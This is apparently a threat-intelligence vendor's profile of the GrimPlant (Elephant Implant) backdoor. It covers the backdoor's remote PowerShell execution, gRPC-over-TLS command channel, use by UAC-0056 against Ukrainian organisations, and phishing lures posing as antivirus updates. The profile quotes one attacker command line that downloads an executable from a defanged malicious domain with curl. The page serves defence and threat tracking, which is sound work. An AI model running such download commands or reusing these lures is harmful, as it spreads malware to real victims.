GrimPlant, also known as Elephant Implant, is a Go-written Windows backdoor belonging to the Elephant malware framework. It enables operators to execute arbitrary PowerShell scripts and other remotely supplied commands, returning execution results to its command-and-control server. It collects host information, including the IP address, hostname, operating system, username, home directory, and CPU count, and generates a machine identifier. Command-and-control communication uses gRPC over HTTP/2 protected by TLS, with an embedded certificate supporting server validation. The implant periodically sends heartbeats and polls for commands.
GrimPlant has been used by UAC-0056, also tracked as SaintBear, UNC2589, and Ember Bear, in cyberespionage campaigns against Ukrainian government organizations and other Ukrainian entities, including media organizations. Delivery chains have used spear-phishing emails containing macro-enabled Excel attachments, fake antivirus or security updates, and executables disguised as translation software. Elephant dropper and downloader components retrieve and execute GrimPlant alongside GraphSteel, the framework's credential and file-stealing component. The downloader establishes Windows registry-based autorun persistence for the deployment. Some campaigns also deploy Cobalt Strike Beacon. GrimPlant provides remote command execution and host reconnaissance; the dedicated credential and document collection functions belong to GraphSteel.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
GrimPlant is a simple backdoor allowing for remote execution of PowerShell commands.
Elephant Implant, also tracked as GrimPlant backdoor, seems to be one of the most important payloads in this attack, the researchers say.
23 distinct techniques documented for this family, organized by ATT&CK tactic.
The emails were themed as “critical security updates” and contained links to download a fake AV update package.
The phishing emails impersonate Ukrainian government agencies offering ways to increase network security and advise recipients to download "critical security updates," which come in the form of a 60 MB file named "BitdefenderWindowsUpdatePackage.exe."
The capabilities of the two tools cover network reconnaissance, command execution, and file operations... Execute commands... Execute commands received remotely and return results to C2
C:\Windows\System32\cmd.exe /C cd %USERPROFILE%\AppData\Local\Temp\ & curl -O hxxps://forkscenter[.]fr/Sdghrt_umrj6/wisw.exe
EXE-файли (завантажувачі з Discord) захищено протектором Themida ... завантаження, base64-декодування
gets the IP address of the machine by making a request to https://api.ipify.org/
GraphSteel features: Gather hostname, username, and IP address information... GrimPlant capabilities: Gather IP address, hostname, OS, username, home dir
The capabilities of the two tools cover network reconnaissance
GrimPlant capabilities: Gather IP address, hostname, OS, username, home dir
The implant makes use of gRPC to communicate with the C2, it has a TLS certificate embedded in the binary
GrimPlant ... В якості протоколу використовується gRPC (Protocol Buffers + HTTP/2 + SSL)
38 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Backdoor implant that communicates with C2 over gRPC with embedded TLS, derives a unique machine ID, gathers host and user information, and supports encrypted command-and-control communications.
Go-based backdoor belonging to the Elephant Framework. It executes PowerShell commands remotely and communicates with its command-and-control server using gRPC over port 80, protected by TLS with a hardcoded certificate. The reference describes phishing deployments against Ukrainian government organizations.
Go-based backdoor/implant component of Elephant enabling remote command execution via PowerShell. Uses gRPC over TLS with an embedded root CA for server verification and certificate rotation; C2 address provided via encrypted command-line argument; periodic heartbeat and command polling; includes anti-emulation (sleep + 200MB allocation).
A named malware tool associated with UAC-0056 in attacks on Ukrainian infrastructure.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.